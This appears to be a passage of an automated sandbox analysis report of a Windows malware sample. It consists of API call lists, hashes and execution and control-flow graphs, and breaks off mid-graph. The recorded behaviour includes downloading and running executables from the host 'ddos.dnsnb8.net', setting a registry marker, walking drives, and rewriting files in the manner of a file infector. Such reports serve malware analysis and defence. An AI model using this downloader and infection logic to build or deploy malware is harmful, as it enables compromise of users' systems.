                            • Opcode Fuzzy Hash: 7c2fee1621edae99f84a989a42f1e2331250d191d6b0508ab805d5e3736e75c5
                            • Instruction Fuzzy Hash: E151CFB5601B02DFC324CF69D980926B7E4FB187103258A3EE49AE7B90D735E855CF98
                            APIs
                            • strlen.MSVCRT ref: 0040B4AB
                            • HeapAlloc.KERNEL32(00000000,00000001,?,00000000,?,?,?,00C449C0,0040B1D7,?,?,00000000,?,?,00402790,?), ref: 0040B4BB
                            • strcpy.MSVCRT(00000000,00000000,?,?,?,00C449C0,0040B1D7,?,?,00000000,?,?,00402790,?,?,?), ref: 0040B4C8
                            • memset.MSVCRT ref: 0040B4F6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: AllocHeapmemsetstrcpystrlen
                            • String ID:
                            • API String ID: 4049419128-0
                            • Opcode ID: 55b6a427adf95e5809c1d05f71988afc620e0c3437487e1d3b8484812a8a7027
                            • Instruction ID: 0bb295cc150549f43b3d9057683be181e8dfe2b3a4a1abf0325e6291dd2313c7
                            • Opcode Fuzzy Hash: 55b6a427adf95e5809c1d05f71988afc620e0c3437487e1d3b8484812a8a7027
                            • Instruction Fuzzy Hash: 4521BC71500A00AFC7219F65AC40B6BB7E5EF84318F14853EFC59A6692CB78E9158B9C
                            APIs
                            • EnterCriticalSection.KERNEL32(00000420,?,00000028,00000000,00000000,0040C8C9,00000028,PostEventClass,00000028,004105D0,0040B1F5,?,00000028,PostEventClass,00000000), ref: 0040C7F6
                            • HeapFree.KERNEL32(00000000,?,?,00000028,00000000,00000000,0040C8C9,00000028,PostEventClass,00000028,004105D0,0040B1F5,?,00000028,PostEventClass,00000000), ref: 0040C813
                            • HeapFree.KERNEL32(00000000,?,?,00000028,00000000,00000000,0040C8C9,00000028,PostEventClass,00000028,004105D0,0040B1F5,?,00000028,PostEventClass,00000000), ref: 0040C82B
                            • LeaveCriticalSection.KERNEL32(000003E0,?,00000028,00000000,00000000,0040C8C9,00000028,PostEventClass,00000028,004105D0,0040B1F5,?,00000028,PostEventClass,00000000), ref: 0040C844
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CriticalFreeHeapSection$EnterLeave
                            • String ID:
                            • API String ID: 1298188129-0
                            • Opcode ID: e6f3c78ebc936d42d7fb78759fc1bb212190e5e550ae887dbe33d38be94fe145
                            • Instruction ID: 971fdef553970bb9ac5113eda6ea4a03700662844cae32e8cc534b7827ff77cd
                            • Opcode Fuzzy Hash: e6f3c78ebc936d42d7fb78759fc1bb212190e5e550ae887dbe33d38be94fe145
                            • Instruction Fuzzy Hash: D8014FB2600608DFC2209F85EC8496BB7A9FB493413558A3EF445A3620C736BC469F9C

                            Execution Graph

                            Execution Coverage:32.7%
                            Dynamic/Decrypted Code Coverage:8.9%
                            Signature Coverage:13%
                            Total number of Nodes:292
                            Total number of Limit Nodes:11
                            execution_graph 998 ae6158 VirtualFree 1006 ae60c7 998->1006 999 ae6198 VirtualFree 1008 ae61b2 999->1008 1000 ae60d5 VirtualAlloc 1000->1006 1001 ae6389 VirtualProtect 1005 ae63b7 1001->1005 1002 ae63fc VirtualProtect 1003 ae6418 1002->1003 1004 ae615f VirtualFree 1004->1006 1005->1002 1007 ae63e7 VirtualProtect 1005->1007 1006->999 1006->1000 1006->1004 1007->1002 1007->1005 1008->1001 1009 ae62fb 1008->1009 1010 ae6076 1011 ae607b 1010->1011 1015 ae60c7 1010->1015 1013 ae60b0 VirtualAlloc 1011->1013 1011->1015 1022 ae61b2 1011->1022 1012 ae615f VirtualFree 1012->1015 1013->1015 1014 ae6198 VirtualFree 1014->1022 1015->1012 1015->1014 1016 ae60d5 VirtualAlloc 1015->1016 1016->1015 1017 ae6389 VirtualProtect 1020 ae63b7 1017->1020 1018 ae63fc VirtualProtect 1019 ae6418 1018->1019 1020->1018 1021 ae63e7 VirtualProtect 1020->1021 1021->1018 1021->1020 1022->1017 1023 ae62fb 1022->1023 1024 ae14e1 1025 ae14fd GetModuleHandleA 1024->1025 1026 ae1541 1024->1026 1027 ae151a VirtualQuery 1025->1027 1028 ae1512 1025->1028 1029 ae1573 1026->1029 1032 ae1549 1026->1032 1027->1028 1028->1026 1035 ae1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1029->1035 1031 ae1579 ExitProcess 1034 ae1566 1032->1034 1052 ae1af9 1032->1052 1036 ae167f 1035->1036 1037 ae167a 1035->1037 1058 ae1718 GetSystemTimeAsFileTime 1036->1058 1070 ae139f GetVersionExA 1037->1070 1040 ae1686 1041 ae16ca 1040->1041 1044 ae16a0 CreateThread 1040->1044 1042 ae16d7 1041->1042 1043 ae16d0 1041->1043 1046 ae170f 1042->1046 1047 ae16dd lstrcpy 1042->1047 1091 ae1581 1043->1091 1063 ae2c48 memset 1044->1063 1307 ae1099 1044->1307 1046->1031 1047->1031 1051 ae1718 3 API calls 1051->1041 1053 ae1b09 1052->1053 1054 ae1b11 1052->1054 1056 ae1638 188 API calls 1053->1056 1055 ae1b16 CreateThread 1054->1055 1057 ae1b0f 1054->1057 1055->1057 1326 ae1638 189 API calls 1055->1326 1056->1057 1057->1034 1057->1057 1059 ae1754 1058->1059 1060 ae1735 SHSetValueA 1058->1060 1061 ae175a SHGetValueA 1059->1061 1062 ae1786 __aulldiv 1059->1062 1060->1062 1061->1062 1062->1040 1097 ae1973 PathFileExistsA 1063->1097 1065 ae2cb2 1068 ae2cbb VirtualFree 1065->1068 1069 ae16ba WaitForSingleObject 1065->1069 1066 ae2c8f CreateThread WaitForMultipleObjects 1066->1065 1119 ae2b8c memset GetLogicalDriveStringsA 1066->1119 1068->1069 1069->1051 1071 ae13cf LookupPrivilegeValueA 1070->1071 1072 ae14da 1070->1072 1073 ae13e7 1071->1073 1074 ae13ef 1071->1074 1072->1036 1287 ae119f GetCurrentProcess OpenProcessToken 1073->1287 1074->1072 1292 ae120e GetModuleHandleA GetProcAddress 1074->1292 1080 ae1448 GetCurrentProcessId 1080->1072 1081 ae1457 1080->1081 1081->1072 1082 ae1319 3 API calls 1081->1082 1083 ae147f 1082->1083 1084 ae1319 3 API calls 1083->1084 1085 ae148e 1084->1085 1085->1072 1086 ae1319 3 API calls 1085->1086 1087 ae14b4 1086->1087 1088 ae1319 3 API calls 1087->1088 1089 ae14c3 1088->1089 1090 ae1319 3 API calls 1089->1090 1090->1072 1306 ae185b GetSystemTimeAsFileTime srand rand srand rand 1091->1306 1093 ae1592 wsprintfA wsprintfA lstrlen CreateFileA 1094 ae15fb WriteFile CloseHandle 1093->1094 1095 ae1633 1093->1095 1094->1095 1096 ae161d ShellExecuteA 1094->1096 1095->1046 1096->1095 1098 ae1ac7 1097->1098 1099 ae19a0 1097->1099 1098->1065 1098->1066 1100 ae19af CreateFileA 1099->1100 1101 ae1a28 GetFileSize 1100->1101 1102 ae19c4 Sleep 1100->1102 1103 ae1a38 1101->1103 1104 ae1a80 1101->1104 1102->1100 1105 ae19d5 1102->1105 1103->1104 1106 ae1a3d VirtualAlloc 1103->1106 1107 ae1a8d FindCloseChangeNotification 1104->1107 1108 ae1a96 1104->1108 1118 ae185b GetSystemTimeAsFileTime srand rand srand rand 1105->1118 1106->1104 1117 ae1a53 1106->1117 1107->1108 1111 ae1aad 1108->1111 1116 ae1a9c DeleteFileA 1108->1116 1110 ae19da wsprintfA CopyFileA 1110->1101 1112 ae1a0d CreateFileA 1110->1112 1111->1098 1115 ae1ab8 VirtualFree 1111->1115 1112->1101 1112->1116 1113 ae1a59 ReadFile 1113->1104 1113->1117 1115->1098 1116->1111 1117->1104 1117->1113 1118->1110 1120 ae2c09 WaitForMultipleObjects 1119->1120 1123 ae2bc8 1119->1123 1121 ae2c3c 1120->1121 1122 ae2c2a CreateThread 1120->1122 1122->1121 1130 ae2845 1122->1130 1124 ae2bfa lstrlen 1123->1124 1125 ae2bd2 GetDriveTypeA 1123->1125 1126 ae2be3 CreateThread 1123->1126 1124->1120 1124->1123 1125->1123 1125->1124 1126->1124 1127 ae2b7d 1126->1127 1140 ae29e2 memset wsprintfA 1127->1140 1277 ae274a memset memset SHGetSpecialFolderPathA wsprintfA 1130->1277 1132 ae2878 DeleteFileA 1133 ae288c VirtualFree 1132->1133 1134 ae289a 1132->1134 1133->1134 1136 ae28ab 1134->1136 1137 ae28a4 CloseHandle 1134->1137 1135 ae2692 8 API calls 1138 ae2853 1135->1138 1137->1136 1138->1132 1138->1135 1139 ae239d 186 API calls 1138->1139 1139->1138 1141 ae2abc memset memset FindFirstFileA 1140->1141 1142 ae2a3a memset lstrlen lstrcpyn strrchr 1140->1142 1154 ae28b8 memset wsprintfA 1141->1154 1142->1141 1144 ae2a88 1142->1144 1144->1141 1146 ae2a9a lstrcmpiA 1144->1146 1148 ae2aad lstrlen 1146->1148 1149 ae2b74 1146->1149 1147 ae2b61 FindNextFileA 1150 ae2b6d FindClose 1147->1150 1151 ae2b23 1147->1151 1148->1141 1148->1146 1150->1149 1152 ae2b35 lstrcmpiA 1151->1152 1153 ae28b8 174 API calls 1151->1153 1152->1150 1152->1151 1153->1147 1155 ae2905 1154->1155 1164 ae2951 memset 1154->1164 1156 ae291b memset wsprintfA 1155->1156 1157 ae2956 strrchr 1155->1157 1155->1164 1158 ae29e2 180 API calls 1156->1158 1159 ae2967 lstrcmpiA 1157->1159 1157->1164 1158->1164 1160 ae297a 1159->1160 1161 ae2988 lstrcmpiA 1159->1161 1172 ae1e6e 1160->1172 1162 ae2994 1161->1162 1161->1164 1165 ae29ad strstr 1162->1165 1166 ae29a5 lstrcpy 1162->1166 1164->1147 1167 ae29cb 1165->1167 1168 ae29d3 1165->1168 1166->1165 1215 ae239d strstr 1167->1215 1237 ae2692 1168->1237 1173 ae1e7d 1172->1173 1246 ae1df6 strrchr 1173->1246 1176 ae2332 1179 ae233d UnmapViewOfFile 1176->1179 1180 ae2346 1176->1180 1177 ae1eb0 SetFileAttributesA CreateFileA 1177->1176 1178 ae1edf 1177->1178 1251 ae1915 1178->1251 1179->1180 1182 ae234b FindCloseChangeNotification 1180->1182 1183 ae2350 1180->1183 1182->1183 1185 ae2356 FindCloseChangeNotification 1183->1185 1186 ae2391 1183->1186 1185->1186 1186->1164 1187 ae1f2e 1187->1176 1257 ae1c81 1187->1257 1191 ae1f92 1192 ae1c81 2 API calls 1191->1192 1193 ae1f9f 1192->1193 1193->1176 1194 ae1af9 169 API calls 1193->1194 1195 ae2024 1193->1195 1199 ae1fc0 1194->1199 1195->1176 1196 ae1af9 169 API calls 1195->1196 1197 ae207a 1196->1197 1198 ae1af9 169 API calls 1197->1198 1203 ae2090 1198->1203 1199->1176 1199->1195 1200 ae1af9 169 API calls 1199->1200 1201 ae1ffe 1200->1201 1202 ae2013 FlushViewOfFile 1201->1202 1202->1195 1204 ae20bb memset memset 1203->1204 1205 ae20f5 1204->1205 1206 ae1c81 2 API calls 1205->1206 1208 ae21de 1206->1208 1207 ae2226 memcpy UnmapViewOfFile CloseHandle 1262 ae1b8a 1207->1262 1208->1207 1210 ae226e 1270 ae185b GetSystemTimeAsFileTime srand rand srand rand 1210->1270 1212 ae22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1213 ae1915 3 API calls 1212->1213 1214 ae231f CloseHandle 1213->1214 1214->1176 1216 ae2451 CreateFileA GetFileSize 1215->1216 1222 ae23d8 1215->1222 1217 ae2675 CloseHandle 1216->1217 1218 ae2480 1216->1218 1219 ae267c RemoveDirectoryA 1217->1219 1218->1217 1220 ae2499 1218->1220 1221 ae2687 1219->1221 1223 ae1915 3 API calls 1220->1223 1221->1164 1222->1216 1222->1221 1224 ae24a4 9 API calls 1223->1224 1272 ae189d memset CreateProcessA 1224->1272 1227 ae255c Sleep memset wsprintfA 1228 ae29e2 163 API calls 1227->1228 1229 ae2597 memset wsprintfA Sleep 1228->1229 1230 ae189d 6 API calls 1229->1230 1231 ae25e4 Sleep CreateFileA 1230->1231 1232 ae1915 3 API calls 1231->1232 1233 ae2610 CloseHandle 1232->1233 1233->1219 1234 ae261e 1233->1234 1234->1219 1235 ae2641 SetFilePointer WriteFile 1234->1235 1235->1219 1236 ae2667 SetEndOfFile 1235->1236 1236->1219 1238 ae26b2 WaitForSingleObject 1237->1238 1239 ae26a2 CreateEventA 1237->1239 1240 ae26c1 lstrlen ??2@YAPAXI 1238->1240 1243 ae2708 1238->1243 1239->1238 1241 ae26da lstrcpy 1240->1241 1242 ae2736 SetEvent 1240->1242 1245 ae26f1 1241->1245 1242->1164 1243->1242 1244 ae2718 lstrcpy ??3@YAXPAX 1243->1244 1244->1245 1245->1242 1247 ae1e13 lstrcpy strrchr 1246->1247 1249 ae1e62 1246->1249 1248 ae1e40 lstrcmpiA 1247->1248 1247->1249 1248->1249 1250 ae1e52 lstrlen 1248->1250 1249->1176 1249->1177 1250->1248 1250->1249 1252 ae1928 1251->1252 1255 ae1924 SetFilePointer CreateFileMappingA MapViewOfFile 1251->1255 1253 ae192e memset GetFileTime 1252->1253 1254 ae194f 1252->1254 1253->1255 1254->1255 1256 ae1954 SetFileTime 1254->1256 1255->1176 1255->1187 1256->1255 1258 ae1c9c 1257->1258 1259 ae1c94 1257->1259 1258->1259 1260 ae1cae memset memset 1258->1260 1259->1176 1261 ae185b GetSystemTimeAsFileTime srand rand srand rand 1259->1261 1260->1259 1261->1191 1268 ae1b93 1262->1268 1264 ae1bca srand 1265 ae1bd8 rand 1264->1265 1266 ae1c08 1265->1266 1266->1265 1267 ae1c29 memset memcpy lstrcat 1266->1267 1267->1210 1268->1268 1271 ae185b GetSystemTimeAsFileTime srand rand srand rand 1268->1271 1270->1212 1271->1264 1273 ae190c 1272->1273 1274 ae18e0 CloseHandle WaitForSingleObject 1272->1274 1273->1219 1273->1227 1275 ae18fb GetExitCodeProcess 1274->1275 1276 ae1907 CloseHandle 1274->1276 1275->1276 1276->1273 1286 ae185b GetSystemTimeAsFileTime srand rand srand rand 1277->1286 1279 ae27b5 wsprintfA CopyFileA 1280 ae27de wsprintfA 1279->1280 1281 ae2840 1279->1281 1282 ae1973 17 API calls 1280->1282 1281->1138 1283 ae280f 1282->1283 1284 ae2813 DeleteFileA 1283->1284 1285 ae2820 CreateFileA 1283->1285 1284->1285 1285->1281 1286->1279 1288 ae11c6 AdjustTokenPrivileges 1287->1288 1289 ae1200 CloseHandle 1287->1289 1290 ae11f6 1288->1290 1291 ae11f7 CloseHandle 1288->1291 1289->1074 1290->1291 1291->1289 1293 ae123f GetCurrentProcessId OpenProcess 1292->1293 1294 ae1310 1292->1294 1293->1294 1295 ae1262 1293->1295 1294->1072 1301 ae1319 1294->1301 1296 ae12b0 VirtualAlloc 1295->1296 1297 ae12f1 CloseHandle 1295->1297 1299 ae1296 VirtualFree 1295->1299 1300 ae12b8 1295->1300 1296->1295 1296->1300 1297->1294 1298 ae1302 VirtualFree 1297->1298 1298->1294 1299->1296 1300->1297 1302 ae134a 1301->1302 1303 ae132a GetModuleHandleA GetProcAddress 1301->1303 1304 ae1351 memset 1302->1304 1305 ae1363 1302->1305 1303->1302 1303->1305 1304->1305 1305->1072 1305->1080 1306->1093 1308 ae1196 1307->1308 1309 ae10ba 1307->1309 1309->1308 1325 ae185b GetSystemTimeAsFileTime srand rand srand rand 1309->1325 1311 ae1118 wsprintfA wsprintfA URLDownloadToFileA 1312 ae10dc 1311->1312 1313 ae1168 lstrlen Sleep 1311->1313 1316 ae1000 CreateFileA 1312->1316 1313->1309 1317 ae1025 GetFileSize CreateFileMappingA MapViewOfFile 1316->1317 1318 ae1092 WinExec lstrlen 1316->1318 1319 ae107b 1317->1319 1320 ae1057 1317->1320 1318->1308 1318->1309 1323 ae108d CloseHandle 1319->1323 1324 ae1087 CloseHandle 1319->1324 1321 ae1074 UnmapViewOfFile 1320->1321 1322 ae1061 1320->1322 1321->1319 1322->1321 1323->1318 1324->1323 1325->1311 1327 ae2361 1328 ae236b UnmapViewOfFile 1327->1328 1329 ae2374 1327->1329 1328->1329 1330 ae2379 CloseHandle 1329->1330 1331 ae2382 1329->1331 1330->1331 1332 ae2388 CloseHandle 1331->1332 1333 ae2391 1331->1333 1332->1333

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_00AE65A6 1 Function_00AE67A4 2 Function_00AE28B8 22 Function_00AE239D 2->22 29 Function_00AE2692 2->29 30 Function_00AE1E6E 2->30 32 Function_00AE29E2 2->32 3 Function_00AE1638 19 Function_00AE1581 3->19 21 Function_00AE139F 3->21 25 Function_00AE1718 3->25 26 Function_00AE1099 3->26 46 Function_00AE2C48 3->46 53 Function_00AE17D0 3->53 4 Function_00AE6834 5 Function_00AE6734 13 Function_00AE6A84 5->13 14 Function_00AE6B02 5->14 16 Function_00AE6D00 5->16 6 Function_00AE69B0 7 Function_00AE120E 8 Function_00AE680F 9 Function_00AE2B8C 37 Function_00AE2B7D 9->37 48 Function_00AE2845 9->48 10 Function_00AE600A 11 Function_00AE1B8A 51 Function_00AE185B 11->51 12 Function_00AE1D8A 13->8 42 Function_00AE6CF2 13->42 33 Function_00AE6B63 14->33 15 Function_00AE1000 15->53 16->6 16->33 16->42 17 Function_00AE6001 17->10 18 Function_00AE1C81 19->51 20 Function_00AE119F 21->7 21->20 27 Function_00AE1319 21->27 23 Function_00AE189D 22->23 28 Function_00AE1915 22->28 22->32 24 Function_00AE2D9B 44 Function_00AE2CF0 25->44 26->15 26->51 30->11 30->12 30->18 30->24 30->28 31 Function_00AE1C68 30->31 34 Function_00AE2D60 30->34 39 Function_00AE1AF9 30->39 41 Function_00AE1DF6 30->41 30->51 32->2 33->1 33->4 33->6 35 Function_00AE14E1 35->3 35->39 36 Function_00AE2361 36->24 37->32 38 Function_00AE6CF8 39->3 40 Function_00AE6076 47 Function_00AE66C8 40->47 42->38 43 Function_00AE1973 43->51 45 Function_00AE274A 45->43 45->51 46->9 46->43 47->13 47->14 47->16 48->22 48->29 48->45 49 Function_00AE605E 50 Function_00AE235D 52 Function_00AE6158 52->47

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                            • String ID: %s*$C:\$Documents and Settings
                            • API String ID: 2826467728-110786608
                            • Opcode ID: ea21193cb2fb46b61ff78d3c82b7b20929feff1d27eee4ca1b7885b673692615
                            • Instruction ID: 37b4cc911b10a53ef366d25f55d55c9994b809b3428a99be22c0445809fe3d6a
                            • Opcode Fuzzy Hash: ea21193cb2fb46b61ff78d3c82b7b20929feff1d27eee4ca1b7885b673692615
                            • Instruction Fuzzy Hash: 7C4154B3804389AFDB20DBE1DC89EEB77ACEB84315F040929F544D7111E634DA5987A2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 172 ae1099-ae10b4 173 ae10ba-ae10c7 172->173 174 ae1199-ae119c 172->174 175 ae10c8-ae10d4 173->175 176 ae10da 175->176 177 ae1184-ae1190 175->177 178 ae1113-ae1162 call ae185b wsprintfA * 2 URLDownloadToFileA 176->178 177->175 179 ae1196-ae1198 177->179 182 ae10dc-ae110d call ae1000 WinExec lstrlen 178->182 183 ae1168-ae1182 lstrlen Sleep 178->183 179->174 182->178 182->179 183->177 183->178
                            APIs
                              • Part of subcall function 00AE185B: GetSystemTimeAsFileTime.KERNEL32(00AE1F92,00000000,?,00000000,?,?,?,00AE1F92,?,00000000,00000002), ref: 00AE1867
                              • Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1878
                              • Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1880
                              • Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1890
                              • Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1894
                            • WinExec.KERNEL32(?,00000005), ref: 00AE10F1
                            • lstrlen.KERNEL32(00AE4748), ref: 00AE10FA
                            • wsprintfA.USER32 ref: 00AE112A
                            • wsprintfA.USER32 ref: 00AE1143
                            • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00AE115B
                            • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00AE1169
                            • Sleep.KERNEL32 ref: 00AE1179
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                            • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                            • API String ID: 1280626985-685328806
                            • Opcode ID: c351b3643906983e61494b20671df90d57f35ebb617e02975c06937c5e9a6966
                            • Instruction ID: b213c2dce80cb99363b756243fdad03395b43eb122538c3ea244bc2c060331dc
                            • Opcode Fuzzy Hash: c351b3643906983e61494b20671df90d57f35ebb617e02975c06937c5e9a6966
                            • Instruction Fuzzy Hash: EE218C769002D8BADF20DBA2DC88BAEBBBDAB09315F114199E501A7051D7749B85CFA0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 216 ae1718-ae1733 GetSystemTimeAsFileTime 217 ae1754-ae1758 216->217 218 ae1735-ae1752 SHSetValueA 216->218 219 ae17c6-ae17cd 217->219 220 ae175a-ae1784 SHGetValueA 217->220 218->219 220->219 221 ae1786-ae17b3 call ae2cf0 * 2 220->221 221->219 226 ae17b5 221->226 227 ae17bf 226->227 228 ae17b7-ae17bd 226->228 227->219 228->219 228->227
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\aJEWGt.exe), ref: 00AE1729
                            • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00AE174C
                            • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00AE177C
                            • __aulldiv.LIBCMT ref: 00AE1796
                            • __aulldiv.LIBCMT ref: 00AE17A8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: TimeValue__aulldiv$FileSystem
                            • String ID: C:\Users\user\AppData\Local\Temp\aJEWGt.exe$SOFTWARE\GTplus$Time
                            • API String ID: 541852442-1264081733
                            • Opcode ID: 85651223135da5671ebb956a246556467843416f515479a4cbdffb1689402a1e
                            • Instruction ID: fc84aa5cc9c2bd1ac4c3ddab37bd104ef540d937c0825e23c22959791e38f470
                            • Opcode Fuzzy Hash: 85651223135da5671ebb956a246556467843416f515479a4cbdffb1689402a1e
                            • Instruction Fuzzy Hash: 98116072A00299BBEF109B96CCC9FEF7BBCEB44B14F108515FA10A7180D6B19A458B60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 229 ae6076-ae6079 230 ae607b-ae6080 229->230 231 ae60e0-ae60eb 229->231 232 ae60f7-ae60f8 230->232 233 ae6082-ae6085 230->233 234 ae60ee-ae60f4 231->234 237 ae60fe-ae6106 232->237 238 ae60fa-ae60fc call ae66c8 232->238 235 ae60f6 233->235 236 ae6087 233->236 234->235 235->232 236->234 242 ae6089-ae6095 236->242 240 ae6108-ae611d 237->240 241 ae6155-ae6189 VirtualFree 237->241 238->237 243 ae611f-ae6121 240->243 251 ae618c-ae6192 241->251 244 ae6097-ae609f 242->244 245 ae60a1-ae60aa 242->245 247 ae6123 243->247 248 ae6151-ae6154 243->248 244->245 249 ae61ba-ae61c8 245->249 250 ae60b0-ae60c1 VirtualAlloc 245->250 247->248 256 ae6125-ae6128 247->256 248->241 254 ae61ca-ae61d7 249->254 255 ae6243-ae6251 249->255 253 ae60c7-ae60cf 250->253 252 ae6198-ae61b0 VirtualFree 251->252 251->253 252->249 259 ae61b2-ae61b4 252->259 253->251 263 ae60d5-ae60df VirtualAlloc 253->263 260 ae61dd-ae61e0 254->260 257 ae6264-ae626f 255->257 258 ae6253 255->258 261 ae612a-ae612e 256->261 262 ae6134-ae613b 256->262 265 ae6271-ae6276 257->265 264 ae6255-ae6258 258->264 259->249 260->255 266 ae61e2-ae61f2 260->266 261->262 273 ae6130-ae6132 261->273 262->273 274 ae613d-ae614f 262->274 263->231 264->257 269 ae625a-ae6262 264->269 270 ae627c-ae6289 265->270 271 ae6389-ae63b1 VirtualProtect 265->271 272 ae61f5-ae61fe 266->272 269->264 286 ae628b 270->286 287 ae6292-ae6298 270->287 277 ae63b7-ae63ba 271->277 275 ae620c-ae6219 272->275 276 ae6200-ae6203 272->276 273->243 274->243 281 ae6238-ae623f 275->281 279 ae621b-ae6228 276->279 280 ae6205-ae6208 276->280 282 ae63fc-ae6416 VirtualProtect 277->282 283 ae63bc-ae63c2 277->283 279->281 288 ae622a-ae6236 280->288 289 ae620a 280->289 281->272 291 ae6241 281->291 284 ae6418-ae641d 282->284 285 ae6420-ae6425 282->285 283->283 290 ae63c4 283->290 286->287 292 ae62a2-ae62ac 287->292 288->281 289->281 290->282 293 ae63c6-ae63cf 290->293 291->260 294 ae62ae 292->294 295 ae62b1-ae62c8 292->295 296 ae63d4-ae63d8 293->296 297 ae63d1 293->297 294->295 300 ae62ce-ae62d4 295->300 301 ae6373-ae6384 295->301 298 ae63dd-ae63e1 296->298 299 ae63da 296->299 297->296 302 ae63e7-ae63fa VirtualProtect 298->302 303 ae63e3 298->303 299->298 304 ae62da-ae62f1 300->304 305 ae62d6-ae62d9 300->305 301->265 302->277 302->282 303->302 307 ae6365-ae636e 304->307 308 ae62f3-ae62f9 304->308 305->304 307->292 309 ae62fb-ae630f 308->309 310 ae6314-ae6326 308->310 311 ae6426-ae64a9 309->311 312 ae634c-ae6360 310->312 313 ae6328-ae634a 310->313 321 ae64ab-ae64c0 311->321 322 